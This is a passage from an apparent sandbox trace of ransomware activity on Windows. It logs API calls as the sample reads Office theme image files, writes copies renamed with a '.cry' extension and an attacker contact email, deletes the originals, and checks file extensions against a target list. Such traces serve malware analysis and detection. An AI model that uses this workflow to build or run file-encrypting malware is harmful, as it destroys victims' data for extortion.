| out: lpNewFilePointer=0x0) returned 1 [0044.008] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0044.640] GetLastError () returned 0x0 [0044.640] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x785, lpOverlapped=0x0) returned 1 [0044.671] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x790, lpOverlapped=0x0) returned 1 [0044.672] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.672] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.673] SetEndOfFile (hFile=0x184) returned 1 [0044.673] CloseHandle (hObject=0x184) returned 1 [0044.673] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.673] SetEndOfFile (hFile=0x190) returned 1 [0044.674] CloseHandle (hObject=0x190) returned 1 [0044.674] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0044.674] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif")) returned 1 [0044.674] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.674] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.674] lstrlenW (lpString=".doc") returned 4 [0044.674] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.674] lstrlenW (lpString=".docx") returned 5 [0044.674] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.674] lstrlenW (lpString=".pdf") returned 4 [0044.674] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.674] lstrlenW (lpString=".xls") returned 4 [0044.674] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.674] lstrlenW (lpString=".xlsx") returned 5 [0044.674] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.674] lstrlenW (lpString=".ppt") returned 4 [0044.674] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.674] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.674] lstrlenW (lpString=".zip") returned 4 [0044.674] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.674] lstrlenW (lpString=".rar") returned 4 [0044.674] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.674] lstrlenW (lpString=".bz2") returned 4 [0044.675] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.675] lstrlenW (lpString=".7z") returned 3 [0044.675] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.675] lstrlenW (lpString=".dbf") returned 4 [0044.675] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.675] lstrlenW (lpString=".1cd") returned 4 [0044.675] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.675] lstrlenW (lpString=".jpg") returned 4 [0044.675] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.675] lstrlenW (lpString=".doc") returned 4 [0044.675] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.675] lstrlenW (lpString=".docx") returned 5 [0044.675] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.675] lstrlenW (lpString=".pdf") returned 4 [0044.675] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.675] lstrlenW (lpString=".xls") returned 4 [0044.675] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.675] lstrlenW (lpString=".xlsx") returned 5 [0044.675] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.675] lstrlenW (lpString=".ppt") returned 4 [0044.675] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.675] lstrlenW (lpString=".zip") returned 4 [0044.675] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.675] lstrlenW (lpString=".rar") returned 4 [0044.675] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.675] lstrlenW (lpString=".bz2") returned 4 [0044.675] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.675] lstrlenW (lpString=".7z") returned 3 [0044.675] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.675] lstrlenW (lpString=".dbf") returned 4 [0044.676] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.676] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.676] lstrlenW (lpString=".1cd") returned 4 [0044.676] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.676] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.676] lstrlenW (lpString=".jpg") returned 4 [0044.676] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.676] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0044.676] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.676] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0044.677] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=20371) returned 1 [0044.677] CloseHandle (hObject=0x190) returned 1 [0044.677] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png")) returned 0x20 [0044.677] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.677] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0044.677] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.677] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.677] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0044.677] GetLastError () returned 0x0 [0044.677] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x4f93, lpOverlapped=0x0) returned 1 [0044.872] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x4fa0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x4fa0, lpOverlapped=0x0) returned 1 [0044.873] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.873] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.874] SetEndOfFile (hFile=0x184) returned 1 [0044.874] CloseHandle (hObject=0x184) returned 1 [0044.874] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.874] SetEndOfFile (hFile=0x190) returned 1 [0044.875] CloseHandle (hObject=0x190) returned 1 [0044.875] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0044.875] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png")) returned 1 [0044.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.876] lstrlenW (lpString=".doc") returned 4 [0044.876] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.876] lstrlenW (lpString=".docx") returned 5 [0044.876] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.876] lstrlenW (lpString=".pdf") returned 4 [0044.876] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.876] lstrlenW (lpString=".xls") returned 4 [0044.876] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.876] lstrlenW (lpString=".xlsx") returned 5 [0044.876] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.876] lstrlenW (lpString=".ppt") returned 4 [0044.876] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.876] lstrlenW (lpString=".zip") returned 4 [0044.876] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.876] lstrlenW (lpString=".rar") returned 4 [0044.876] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.876] lstrlenW (lpString=".bz2") returned 4 [0044.876] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.876] lstrlenW (lpString=".7z") returned 3 [0044.876] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.876] lstrlenW (lpString=".dbf") returned 4 [0044.876] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.876] lstrlenW (lpString=".1cd") returned 4 [0044.876] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.876] lstrlenW (lpString=".jpg") returned 4 [0044.876] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.876] lstrlenW (lpString=".doc") returned 4 [0044.876] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.876] lstrlenW (lpString=".docx") returned 5 [0044.876] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.877] lstrlenW (lpString=".pdf") returned 4 [0044.877] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.877] lstrlenW (lpString=".xls") returned 4 [0044.877] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.877] lstrlenW (lpString=".xlsx") returned 5 [0044.877] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.877] lstrlenW (lpString=".ppt") returned 4 [0044.877] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.877] lstrlenW (lpString=".zip") returned 4 [0044.877] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.877] lstrlenW (lpString=".rar") returned 4 [0044.877] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.877] lstrlenW (lpString=".bz2") returned 4 [0044.877] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.877] lstrlenW (lpString=".7z") returned 3 [0044.877] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.877] lstrlenW (lpString=".dbf") returned 4 [0044.877] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.877] lstrlenW (lpString=".1cd") returned 4 [0044.877] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.877] lstrlenW (lpString=".jpg") returned 4 [0044.877] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.878] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0044.878] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.878] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0044.878] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=20575) returned 1 [0044.878] CloseHandle (hObject=0x190) returned 1 [0044.878] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png")) returned 0x20 [0044.878] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.878] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0044.878] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.878] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.878] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0044.879] GetLastError () returned 0x0 [0044.879] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x505f, lpOverlapped=0x0) returned 1 [0044.880] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x5060, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x5060, lpOverlapped=0x0) returned 1 [0044.881] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.881] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.881] SetEndOfFile (hFile=0x184) returned 1 [0044.882] CloseHandle (hObject=0x184) returned 1 [0044.882] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.882] SetEndOfFile (hFile=0x190) returned 1 [0044.883] CloseHandle (hObject=0x190) returned 1 [0044.883] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0044.883] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png")) returned 1 [0044.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.883] lstrlenW (lpString=".doc") returned 4 [0044.883] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.883] lstrlenW (lpString=".docx") returned 5 [0044.883] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.883] lstrlenW (lpString=".pdf") returned 4 [0044.883] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.883] lstrlenW (lpString=".xls") returned 4 [0044.883] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.883] lstrlenW (lpString=".xlsx") returned 5 [0044.883] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.883] lstrlenW (lpString=".ppt") returned 4 [0044.883] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.883] lstrlenW (lpString=".zip") returned 4 [0044.883] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.883] lstrlenW (lpString=".rar") returned 4 [0044.883] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.884] lstrlenW (lpString=".bz2") returned 4 [0044.884] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.884] lstrlenW (lpString=".7z") returned 3 [0044.884] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.884] lstrlenW (lpString=".dbf") returned 4 [0044.884] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.884] lstrlenW (lpString=".1cd") returned 4 [0044.884] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.884] lstrlenW (lpString=".jpg") returned 4 [0044.884] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.884] lstrlenW (lpString=".doc") returned 4 [0044.884] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.884] lstrlenW (lpString=".docx") returned 5 [0044.884] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.884] lstrlenW (lpString=".pdf") returned 4 [0044.884] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.884] lstrlenW (lpString=".xls") returned 4 [0044.884] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.884] lstrlenW (lpString=".xlsx") returned 5 [0044.884] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.884] lstrlenW (lpString=".ppt") returned 4 [0044.884] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.884] lstrlenW (lpString=".zip") returned 4 [0044.884] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.884] lstrlenW (lpString=".rar") returned 4 [0044.884] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.884] lstrlenW (lpString=".bz2") returned 4 [0044.884] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.884] lstrlenW (lpString=".7z") returned 3 [0044.884] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.885] lstrlenW (lpString=".dbf") returned 4 [0044.885] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.885] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.885] lstrlenW (lpString=".1cd") returned 4 [0044.885] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.885] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0044.885] lstrlenW (lpString=".jpg") returned 4 [0044.885] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.885] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0044.885] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.885] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0044.885] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=1287) returned 1 [0044.885] CloseHandle (hObject=0x190) returned 1 [0044.885] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif")) returned 0x20 [0044.885] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.885] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0044.886] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.886] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.886] CreateFileW 